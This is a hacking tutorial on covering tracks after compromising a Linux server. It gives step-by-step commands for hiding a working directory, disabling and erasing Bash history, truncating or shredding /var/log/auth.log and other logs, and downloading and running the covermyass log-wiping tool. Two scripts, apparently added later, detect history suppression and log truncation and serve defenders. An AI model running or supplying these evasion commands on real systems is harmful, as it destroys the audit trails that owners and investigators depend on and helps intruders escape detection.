The final stage of exploitation is covering your tracks: clearing the traces of your activity, including logs, so that the intrusion is less likely to be detected. This is especially important for persistence, when the target will be accessed again later.
To show you the basics of covering your tracks, we'll first compromise a target and then explore some techniques used to remove Bash history, clear logs and remain hidden on a compromised Linux system.
Step 1: Compromising a Target
The first thing to do is exploit the target. We can use command injection to take advantage of the way the server processes OS commands to get a shell.
We will also want to upgrade our new shell to a fully interactive shell. Doing so makes it easier to work in general and we can also use tab completion and terminal history.
Then we can escalate our privileges, which gives us more control over the system and makes it easier to go unnoticed.
Step 2: Create an easy-to-delete hidden folder
Once we have root access, we can create a hidden folder to work out of and store scripts or files. A dot-directory won't fool anyone except the most novice admin, but another layer of discretion certainly wouldn't hurt. First, let's locate all writable directories with the following command:
root@target:/# find / -perm -222 -type d 2>/dev/null
/dev/shm
/var/lock
/var/lib/php5
/var/tmp
/var/www/dav
/var/www/twiki/data/Sandbox
/var/www/twiki/data/Main
/var/www/twiki/data/Know
/var/www/twiki/data/TWiki
/var/www/twiki/data/_default
/var/www/twiki/data/Trash
/var/www/twiki/pub/Sandbox
/var/www/twiki/pub/Main
/var/www/twiki/pub/Know
/var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL
/var/www/twiki/pub/TWiki
/var/www/twiki/pub/TWiki/TWikiDocGraphics
/var/www/twiki/pub/TWiki/TWikiTemplates
/var/www/twiki/pub/TWiki/TWikiLogos
/var/www/twiki/pub/TWiki/PreviewBackground
/var/www/twiki/pub/TWiki/FileAttachment
/var/www/twiki/pub/TWiki/WabiSabi
/var/www/twiki/pub/Trash
/var/www/twiki/pub/icn
/tmp
/tmp/.ICE-unix
We can create a hidden directory with the mkdir command by prefixing the name with a dot:
root@target:/# mkdir /dev/shm/.secret
If we list the contents of /dev/shm, nothing appears:
root@target:/# ls -l /dev/shm/
total 0
Only when we use the -a switch to display all files and folders does it show up:
root@target:/# ls -la /dev/shm/
total 0
drwxrwxrwt 3 root root 60 2019-06-19 13:49 .
drwxr-xr-x 13 root root 13480 2019-06-19 13:41 ..
drwxr-xr-x 2 root root 40 2019-06-19 13:49 .secret
And to delete the directory once we're done on the machine, use the rmdir command:
root@target:/# rmdir /dev/shm/.secret/
Step 3: Delete the Bash History
First, let's view the commands recorded so far with the history command:
root@target:/# history
1 cd /
2 ls
3 find / -perm -222 -type d 2>/dev/null
4 cd /dev/shm/
5 cd /
6 mkdir /dev/shm/.secret
7 ls -l /dev/shm/
8 ls -la /dev/shm/
9 ls
10 rmdir /dev/shm/.secret/
11 history
Commands are written to the file named by the HISTFILE environment variable, which is usually ~/.bash_history. We can echo the variable to see the location:
root@target:/# echo $HISTFILE
We can use the unset command to remove the variable:
root@target:/# unset HISTFILE
So if we echo it again, nothing appears:
root@target:/# echo $HISTFILE
We can also make sure that the command history is never saved by pointing it at /dev/null. Set the variable to that path:
root@target:/# HISTFILE=/dev/null
Or do the same with the export command:
root@target:/# export HISTFILE=/dev/null
And the history is now being sent to /dev/null (nowhere):
root@target:/# echo $HISTFILE
/dev/null
We can set the number of commands kept in memory during the current session to 0 using the HISTSIZE variable:
root@target:/# HISTSIZE=0
Or use the export command:
root@target:/# export HISTSIZE=0
We can also change the number of lines allowed in the history file with the HISTFILESIZE variable. Set this to 0:
root@target:/# HISTFILESIZE=0
Or with export:
root@target:/# export HISTFILESIZE=0
The set command can also be used to change shell options. Use the following command to disable the history option:
root@target:/# set +o history
And to enable it again:
root@target:/# set -o history
Likewise, the shopt command can be used to change shell options. Use the following command to disable history:
root@target:/# shopt -ou history
And to enable it again:
root@target:/# shopt -os history
While running commands on the target system, we can sometimes keep them out of the history by starting the command with a leading space (note the double space after the prompt):
root@target:~#  cat /etc/passwd
That technique only works when the HISTCONTROL variable contains ignorespace or ignoreboth, so it depends on how the system is configured.
We can also just clear the history with the -c switch:
root@target:~# history -c
To write the changes to disk, use the -w switch:
root@target:~# history -w
That will only clear history for the current session. To be absolutely sure that history is cleared when you close a session, the following command is useful:
root@target:/# cat /dev/null > ~/.bash_history && history -c && exit
We can also use the kill command to close the session without saving history:
root@target:/# kill -9 $$
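Every technique in this step leaves a fingerprint an administrator can look for, so here is the defender's side: an audit script added for this article (not from the original post or any tool) that checks each home directory for a .bash_history that is a symlink to /dev/null or has been emptied, and greps the shell rc files for the HISTFILE, HISTSIZE, HISTFILESIZE, set +o history and shopt -ou history settings shown above. The root-directory argument and the output format are my own.

```shell
#!/bin/sh
# Defender-side audit for the history-suppression techniques shown in Step 3.
# Hypothetical script written for this article, not part of any tool: it walks
# the home directories under ROOT (default /home), flags a .bash_history that is
# a symlink to /dev/null or that is empty, and greps the shell rc files for
# HISTFILE/HISTSIZE/HISTFILESIZE overrides and set +o history / shopt -ou history.
# Prints one finding per line and ends with a count.

audit_history() {   # usage: audit_history [ROOT]
    root="${1:-/home}"
    n=0
    # ERE matching the settings used above to stop history from being kept
    pat='unset[[:space:]]+HISTFILE|HISTFILE=/dev/null|HIST(FILE)?SIZE=0([^0-9]|$)|set[[:space:]]+\+o[[:space:]]+history|shopt[[:space:]]+-ou[[:space:]]+history'
    for home in "$root"/*; do
        [ -d "$home" ] || continue
        user="${home##*/}"
        hist="$home/.bash_history"
        if [ -L "$hist" ] && [ "$(readlink "$hist")" = "/dev/null" ]; then
            echo "$user: .bash_history is a symlink to /dev/null"; n=$((n + 1))
        elif [ -f "$hist" ] && [ ! -s "$hist" ]; then
            echo "$user: .bash_history exists but is empty"; n=$((n + 1))
        fi
        for rc in .bashrc .bash_profile .profile .bash_logout; do
            f="$home/$rc"
            [ -f "$f" ] || continue
            # grep -c prints 0 and exits 1 when nothing matches
            hits=$(grep -cE "$pat" "$f") || hits=0
            if [ "$hits" -gt 0 ]; then
                grep -nE "$pat" "$f" | sed "s|^|$user: $rc:|"
                n=$((n + hits))
            fi
        done
    done
    echo "$n finding(s)"
}
```

Run it as root against /home (and again against the parent of any other home, such as /root). The runtime-only tricks (history -c, kill -9 $$, leading-space commands) leave nothing in rc files, which is why the empty-history check and forwarding auth logs off the host matter.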
Step 4: Clear the Log Files
In addition to Bash history, log files must also be cleared to go unnoticed. Here are some common log files and what they contain:
- /var/log/auth.log: authentication events
- /var/log/cron.log: cron jobs
- /var/log/maillog: mail
- /var/log/httpd: Apache
Of course we can simply delete a log with the rm command:
root@target:/# rm /var/log/auth.log
But a missing log file will likely raise red flags, so it's better to empty the file rather than delete it completely. We can use the truncate command to reduce its size to 0:
root@target:/# truncate -s 0 /var/log/auth.log
Note that truncate is not present on all systems. We can achieve the same by echoing nothing into the file:
root@target:/# echo '' > /var/log/auth.log
And also with > alone to empty the file:
root@target:/# > /var/log/auth.log
We can also send /dev/null into it:
root@target:/# cat /dev/null > /var/log/auth.log
Or use the tee command:
root@target:/# true | tee /var/log/auth.log
We can also use the dd command to write nothing to the log file:
root@target:/# dd if=/dev/null of=/var/log/auth.log
0+0 records in
0+0 records out
0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s
The shred command can be used to overwrite a file with meaningless binary data:
root@target:/# shred /var/log/auth.log
We can even tack on -zu, which adds a final overwrite with zeros to hide the shredding and then truncates and removes the file:
root@target:/# shred -zu /var/log/auth.log
Step 5: Use a Tool to Get Things Erased
To increase the chances of our activity on the target going undiscovered, we can use a tool to make sure everything is erased. Covermyass is a script that automates many of the processes we've already covered, including clearing log files and disabling Bash history.
We can get the script from GitHub with wget (assuming the target has internet access; otherwise it must be transferred manually):
root@target:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass
Move to a writable folder and use chmod to make it executable:
root@target:/tmp# chmod +x covermyass
Then we can run it:
root@target:/tmp# ./covermyass
Welcome to Cover my ass tool!
Choose an option:
1) Clear logs for the user's root
2) Permanently disable the authentication and bash history
3) Restore settings to default
99) Closing tool
>
We get a custom prompt with a few options to choose from. Let's select the first one to clear the logs:
> 1
[+] /var/log/messages cleaned up.
[+] /var/log/auth.log cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned up.
[+] History file deleted.
Reminder: You have to reload the session to see effects.
Type exit to do this.
We can also disable Bash and Auth history with option 2:
> 2
[+] Permanently send /var/log/auth.log to /dev/null
[+] Permanently send bash_history to /dev/null
[+] Set HISTFILESIZE & HISTSIZE to 0
[+] Library for disabled history
Bash log disabled permanently.
And in case you need to erase everything quickly, append now to the command:
root@target:/tmp# ./covermyass now
[+] /var/log/messages cleaned up.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned up.
[+] History file deleted.
Reminder: You have to reload the session to see effects.
Type exit to do this.
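Whether done by hand as in Step 4 or by covermyass as above, every wiping method except rm leaves the log in place with a smaller size and the same inode, while rm or shred -u leaves it missing or recreated. Here is a detector added for this article (not from the original post or from covermyass) that snapshots a log directory and reports files that shrank, were replaced or disappeared; it assumes GNU stat and awk, and the snapshot format and the logrotate heuristic are my own.

```shell
#!/bin/sh
# Defender-side detector for the log wiping shown in Step 4 and by covermyass
# in Step 5. Hypothetical script written for this article (not part of any
# tool): snapshot_logs records inode and size of every file under a log
# directory; compare_snapshots reports files that shrank (truncate, >,
# cat /dev/null >, dd, tee, shred -z), were replaced (rm and recreate) or
# disappeared. Assumes GNU stat and awk (Linux).

snapshot_logs() {   # usage: snapshot_logs DIR  -> "inode<TAB>size<TAB>path" per line
    find "$1" -type f -exec stat --printf '%i\t%s\t%n\n' {} +
}

compare_snapshots() {   # usage: compare_snapshots OLD_SNAPSHOT NEW_SNAPSHOT
    awk -F'\t' '
        FILENAME == ARGV[1] { oi[$3] = $1; os[$3] = $2; next }   # old snapshot
                            { ni[$3] = $1; ns[$3] = $2 }         # new snapshot
        END {
            for (p in oi) {
                if (!(p in ni)) { printf "DELETED %s\n", p; continue }
                if (ni[p] != oi[p])
                    printf "REPLACED %s (inode %s -> %s)\n", p, oi[p], ni[p]
                else if (ns[p] + 0 < os[p] + 0) {
                    # A rotated sibling (p.1) next to a shrunk file is what
                    # logrotate copytruncate leaves behind; flag it separately.
                    if ((p ".1") in ni)
                        printf "ROTATED? %s shrank %s -> %s bytes, %s.1 present\n", p, os[p], ns[p], p
                    else
                        printf "TRUNCATED %s shrank %s -> %s bytes\n", p, os[p], ns[p]
                }
            }
        }' "$1" "$2"
}
```

Run snapshot_logs /var/log from cron, keep the snapshots off the host, and compare consecutive pairs; rm followed by a fresh file may reuse the freed inode number on ext4, so add %Z (ctime) to the stat format if you need to catch that case too.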
Wrapping Up
Today we explored different techniques used to cover tracks and go unnoticed on a compromised machine. We discussed ways to disable and delete Bash history, methods to clear log files, and used the Covermyass tool to ensure that our activity on the target was cleared. There are other ways to clear certain traces of an attack, such as with Metasploit, with shell scripting or on a compromised Windows machine, but the above should be all you need for a standard Linux machine.